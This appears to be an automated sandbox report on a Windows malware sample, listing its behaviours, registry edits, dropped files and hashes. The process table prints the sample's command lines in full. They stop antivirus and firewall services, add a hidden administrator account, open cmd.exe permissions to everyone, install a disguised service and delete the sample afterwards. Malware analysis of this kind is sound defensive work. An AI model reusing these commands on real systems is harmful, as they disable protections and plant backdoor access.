Analysis Overview
SHA256
33a37adad6fb9555f45400fcb164140bef02b07fdc8c964ce5b6fc8bc22b7257
Threat Level: Likely malicious
The file 128394c4fa5db44d001d415665c98edf_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Grants admin privileges
Event Triggered Execution: Image File Execution Options Injection
Executes dropped EXE
Adds Run key to start application
Modifies WinLogon
Hide Artifacts: Hidden Users
Drops file in System32 directory
Drops file in Windows directory
Unsigned PE
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 15:42
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 15:42
Reported
2024-06-26 15:44
Platform
win7-20240611-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Grants admin privileges
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe\Debugger = "SoundMan.exe" | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SoundMan.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe = "C:\\Windows\\system32\\ctfmon.exe" | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1 = "0" | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\SysWOW64\interne.exe | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| File created | C:\Windows\SysWOW64\ttjj6.ini | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1 = "0" | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\SoundMan.exe | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| File created | C:\Windows\1.inf | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\1.inf | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.app.log | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\runonce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\runonce.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Windows\SoundMan.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| --- | --- |
| C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe" |
| C:\Windows\SysWOW64\cacls.exe | cacls.exe C:\Windows\system32\cmd.exe /e /t /g everyone:F |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server" |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c net user new1 12369 /add&net user new1 12369&net user new1 /active:yes&net localgroup administrators new1 /add |
| C:\Windows\SysWOW64\cmd.exe | cmd /c echo [Version]>%windir%\1.inf&echo Signature="$WINDOWS NT$">>%windir%\1.inf&echo [DefaultInstall.Services]>>%windir%\1.inf&echo AddService=helpsvc,,My_AddService_Name>>%windir%\1.inf&echo [My_AddService_Name]>>%windir%\1.inf&echo DisplayName=Help and Support>>%windir%\1.inf&echo Description=启用在此计算机上运行帮助和支持中心。如果停止服务,帮助和支持中心将不可用。如果禁用服务,任何直接依赖于此服务的服务将无法启动。>>%windir%\1.inf&echo ServiceType=0x10>>%windir%\1.inf&echo StartType=2 >>%windir%\1.inf&echo ServiceBinary=%11%\interne.exe>>%windir%\1.inf&echo ErrorControl=0 >>%windir%\1.inf&rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %windir%\1.inf&del %windir%\1.inf&exit |
| C:\Windows\SysWOW64\net.exe | net user new1 12369 /add |
| C:\Windows\SysWOW64\rundll32.exe | rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\Windows\1.inf |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user new1 12369 /add |
| C:\Windows\SysWOW64\net.exe | net user new1 12369 |
| C:\Windows\SysWOW64\runonce.exe | "C:\Windows\system32\runonce.exe" -r |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user new1 12369 |
| C:\Windows\SysWOW64\net.exe | net user new1 /active:yes |
| C:\Windows\SysWOW64\grpconv.exe | "C:\Windows\System32\grpconv.exe" -o |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user new1 /active:yes |
| C:\Windows\SysWOW64\net.exe | net localgroup administrators new1 /add |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 localgroup administrators new1 /add |
| C:\Windows\SoundMan.exe | C:\Windows\SoundMan.exe |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c echo ping 127.1 -n 3 >nul 2>nul >c:\2.bat&echo del C:\Windows\system32\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe>>c:\2.bat&echo del c:\2.bat>>c:\2.bat&c:\2.bat |
| C:\Windows\SysWOW64\PING.EXE | ping 127.1 -n 3 |
Network
Files
memory/1716-0-0x0000000000400000-0x0000000000437000-memory.dmp
C:\Windows\1.inf
| Algorithm | Digest |
| --- | --- |
| MD5 | 8a3cdcae5040a0e9ffda840903292d09 |
| SHA1 | 968fb550eec0f3726c1b828a01d0496429502f7c |
| SHA256 | 8b5ac0c6629193fec6b4052aa330fe309679a9d248d150cc68e291a54a8a77d9 |
| SHA512 | 669fdfc661c94be7e6bec7d6fbd2307d7494b4f5c26840ac99d1580ffeaf4b71e96798e5e0d223ebdc676c047e7a3aa3695711613098ded0b942796089c95f3a |
\??\PIPE\samr
| Algorithm | Digest |
| --- | --- |
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\SoundMan.exe
| Algorithm | Digest |
| --- | --- |
| MD5 | 1063293cd7bcdafef5dab258a6c55eb6 |
| SHA1 | 89a06e65acb702df0cb96ef513b042fa01c22ec9 |
| SHA256 | c99121e7f999dd4f12583929c3bd6b2f7481b58f42ef7b2cc0e2540c09b80218 |
| SHA512 | 61c8e730bc9ac5a647ad11500a135028702ac3e9b3c8882e006760d48d662fc736d93ad2e876d050377bf987915998ffbdfa18f8c48a40942903b49856a91f49 |
memory/1716-34-0x0000000000400000-0x0000000000437000-memory.dmp
memory/1716-37-0x0000000000400000-0x0000000000437000-memory.dmp
C:\2.bat
| Algorithm | Digest |
| --- | --- |
| MD5 | 6410f1dd47e0842c546c3fca681f6a38 |
| SHA1 | bc9e0e091b79b26c389b5c99c9896fd3d73a9bf2 |
| SHA256 | 4794dcea80d8427d282d6eea007dbf0572b3b2b27dbfe7d7727e5a46eb945a92 |
| SHA512 | 932a4a1f8ff336952bc4c4250af20d34b6bb0cca86f6e34e1eff019294c7cea1c198fa56d7ae54b6fb5c253489173b7346c2e37a233960d93e523f91aea68e47 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-26 15:42
Reported
2024-06-26 15:44
Platform
win10v2004-20240508-en
Max time kernel
125s
Max time network
126s
Command Line
Signatures
Processes
| Process | Command line |
| --- | --- |
| C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe" |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1280,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=4452 /prefetch:8 |
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
memory/4664-0-0x0000000000400000-0x0000000000437000-memory.dmp